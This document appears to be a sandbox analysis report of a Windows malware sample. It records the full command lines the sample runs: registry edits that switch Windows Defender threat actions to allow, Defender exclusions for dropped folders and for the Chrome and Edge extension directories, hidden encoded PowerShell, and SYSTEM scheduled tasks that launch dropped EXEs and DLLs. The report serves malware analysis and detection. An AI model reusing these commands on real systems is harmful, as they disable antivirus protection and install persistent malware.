C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3504
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3248
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:676
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NWoXnskKXdJGC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NWoXnskKXdJGC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VruDcINppTZNIqemGVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VruDcINppTZNIqemGVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kTkhuvRgNyZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kTkhuvRgNyZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nLtdqPxSU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nLtdqPxSU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qnfVUcymejUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qnfVUcymejUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ORLhyEwmHZTZsrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ORLhyEwmHZTZsrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\prcciRLxuAmrJUJV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\prcciRLxuAmrJUJV\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:323⤵PID:2056
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:324⤵PID:948
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NWoXnskKXdJGC" /t REG_DWORD /d 0 /reg:643⤵PID:3532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:323⤵PID:1928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VruDcINppTZNIqemGVR" /t REG_DWORD /d 0 /reg:643⤵PID:3052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:323⤵PID:412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kTkhuvRgNyZU2" /t REG_DWORD /d 0 /reg:643⤵PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:323⤵PID:220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nLtdqPxSU" /t REG_DWORD /d 0 /reg:643⤵PID:2152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:323⤵PID:4164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qnfVUcymejUn" /t REG_DWORD /d 0 /reg:643⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ORLhyEwmHZTZsrVB /t REG_DWORD /d 0 /reg:323⤵PID:3504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ORLhyEwmHZTZsrVB /t REG_DWORD /d 0 /reg:643⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU /t REG_DWORD /d 0 /reg:323⤵PID:1040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZOPVcyJtSRjdZqNgU /t REG_DWORD /d 0 /reg:643⤵PID:4364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\prcciRLxuAmrJUJV /t REG_DWORD /d 0 /reg:323⤵PID:4092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\prcciRLxuAmrJUJV /t REG_DWORD /d 0 /reg:643⤵PID:4852
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gWFicLLPS" /SC once /ST 03:28:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gWFicLLPS"2⤵PID:4596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gWFicLLPS"2⤵PID:636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PYxBkvPuMRnFgrady" /SC once /ST 06:17:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\prcciRLxuAmrJUJV\BQKQobLNmrZfNTa\mBkgFeJ.exe\" qd /JNsite_iddND 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "PYxBkvPuMRnFgrady"2⤵PID:2764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1556
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4856
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1788
-
C:\Windows\Temp\prcciRLxuAmrJUJV\BQKQobLNmrZfNTa\mBkgFeJ.exeC:\Windows\Temp\prcciRLxuAmrJUJV\BQKQobLNmrZfNTa\mBkgFeJ.exe qd /JNsite_iddND 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1040 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bfQCIeAfoMUjiMvHpK"2⤵PID:4344
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3556
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3740
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4348
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nLtdqPxSU\KjvOWA.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "puEiLMJPChlWPyy" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "puEiLMJPChlWPyy2" /F /xml "C:\Program Files (x86)\nLtdqPxSU\WHLqPtA.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "puEiLMJPChlWPyy"2⤵PID:4236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "puEiLMJPChlWPyy"2⤵PID:540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qOTfrABnjfFxtq" /F /xml "C:\Program Files (x86)\kTkhuvRgNyZU2\DiUWwka.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIGAnUJbrZsCh2" /F /xml "C:\ProgramData\ORLhyEwmHZTZsrVB\ZLFnCXK.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tocFlaJiGWcETvbqL2" /F /xml "C:\Program Files (x86)\VruDcINppTZNIqemGVR\QAreWTu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3124
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OfXYuUyTiHvdiUxFtnK2" /F /xml "C:\Program Files (x86)\NWoXnskKXdJGC\HbREogr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4088
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UlrsxbhsbQOtZaLyo" /SC once /ST 07:03:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\prcciRLxuAmrJUJV\XdcljFhG\eQfPJEp.dll\",#1 /eFsite_idWJj 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:636
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UlrsxbhsbQOtZaLyo"2⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:4616
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:4712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:2688
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:368
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "PYxBkvPuMRnFgrady"2⤵PID:5032
-
-
